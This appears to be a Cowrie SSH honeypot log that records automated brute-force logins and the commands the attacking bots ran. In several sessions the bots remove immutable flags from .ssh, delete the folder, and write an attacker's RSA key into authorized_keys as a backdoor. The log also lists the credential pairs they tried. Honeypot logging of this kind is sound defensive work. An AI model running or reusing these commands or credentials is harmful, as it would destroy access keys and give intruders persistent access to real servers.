{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:47:18.340855Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.login.success","username":"root","password":"Test2020","message":"login attempt [root/Test2020] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:47:19.311584Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:47:19.822740Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:47:19.823497Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:47:19.824342Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:20.057651Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:47:20.567551Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:47:20.568236Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:47:20.802836Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:20.803800Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.session.connect","src_ip":"117.34.125.173","src_port":53126,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9cdbc9779fa","protocol":"ssh","message":"New connection: 117.34.125.173:53126 (1.2.3.4:22) [session: d9cdbc9779fa]","sensor":"my-vps","timestamp":"2025-08-24T21:47:21.000408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:47:21.002293Z","src_ip":"117.34.125.173","session":"d9cdbc9779fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:47:21.212413Z","src_ip":"117.34.125.173","session":"d9cdbc9779fa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:47:22.094518Z","src_ip":"117.34.125.173","session":"d9cdbc9779fa"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:23.307593Z","src_ip":"117.34.125.173","session":"d9cdbc9779fa"}
{"eventid":"cowrie.session.connect","src_ip":"117.34.125.173","src_port":53288,"dst_ip":"1.2.3.4","dst_port":22,"session":"cee6f8217865","protocol":"ssh","message":"New connection: 117.34.125.173:53288 (1.2.3.4:22) [session: cee6f8217865]","sensor":"my-vps","timestamp":"2025-08-24T21:47:23.541790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:47:23.542717Z","src_ip":"117.34.125.173","session":"cee6f8217865"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:47:23.766367Z","src_ip":"117.34.125.173","session":"cee6f8217865"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:47:24.701184Z","src_ip":"117.34.125.173","session":"cee6f8217865"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:24.926438Z","src_ip":"117.34.125.173","session":"05621cc8f720"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:47:24.927493Z","src_ip":"117.34.125.173","session":"cee6f8217865"}
{"eventid":"cowrie.session.connect","src_ip":"14.29.181.34","src_port":48244,"dst_ip":"1.2.3.4","dst_port":22,"session":"0143460db679","protocol":"ssh","message":"New connection: 14.29.181.34:48244 (1.2.3.4:22) [session: 0143460db679]","sensor":"my-vps","timestamp":"2025-08-24T21:48:06.836701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:48:06.837729Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:48:07.058006Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.login.success","username":"root","password":"1234!@#$abcd","message":"login attempt [root/1234!@#$abcd] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:48:07.940847Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:48:08.398453Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:48:08.399131Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:48:08.399915Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:48:08.621950Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:48:09.166012Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:48:09.166708Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:48:09.390802Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:48:09.391784Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.session.connect","src_ip":"14.29.181.34","src_port":48543,"dst_ip":"1.2.3.4","dst_port":22,"session":"681d1fd60fcd","protocol":"ssh","message":"New connection: 14.29.181.34:48543 (1.2.3.4:22) [session: 681d1fd60fcd]","sensor":"my-vps","timestamp":"2025-08-24T21:48:09.610480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:48:09.611845Z","src_ip":"14.29.181.34","session":"681d1fd60fcd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:48:09.831424Z","src_ip":"14.29.181.34","session":"681d1fd60fcd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:48:10.714652Z","src_ip":"14.29.181.34","session":"681d1fd60fcd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:48:11.938201Z","src_ip":"14.29.181.34","session":"681d1fd60fcd"}
{"eventid":"cowrie.session.connect","src_ip":"14.29.181.34","src_port":48820,"dst_ip":"1.2.3.4","dst_port":22,"session":"353442abffd8","protocol":"ssh","message":"New connection: 14.29.181.34:48820 (1.2.3.4:22) [session: 353442abffd8]","sensor":"my-vps","timestamp":"2025-08-24T21:48:12.146168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:48:12.147247Z","src_ip":"14.29.181.34","session":"353442abffd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:48:12.355455Z","src_ip":"14.29.181.34","session":"353442abffd8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:48:13.191630Z","src_ip":"14.29.181.34","session":"353442abffd8"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:48:13.403261Z","src_ip":"14.29.181.34","session":"0143460db679"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:48:13.404420Z","src_ip":"14.29.181.34","session":"353442abffd8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55866,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbd4b1383c60","protocol":"ssh","message":"New connection: 217.72.205.35:55866 (1.2.3.4:22) [session: fbd4b1383c60]","sensor":"my-vps","timestamp":"2025-08-24T21:48:53.147645Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:48:53.148881Z","src_ip":"217.72.205.35","session":"fbd4b1383c60"}
{"eventid":"cowrie.session.connect","src_ip":"183.232.230.82","src_port":18483,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4fcae59930c","protocol":"ssh","message":"New connection: 183.232.230.82:18483 (1.2.3.4:22) [session: e4fcae59930c]","sensor":"my-vps","timestamp":"2025-08-24T21:49:09.935824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:49:09.936816Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:49:10.160036Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.login.success","username":"root","password":"Password@123123","message":"login attempt [root/Password@123123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:49:11.096625Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:49:11.559797Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:49:11.560522Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:49:11.561663Z","src_ip":"183.232.230.82","session":"e4fcae59930c"}
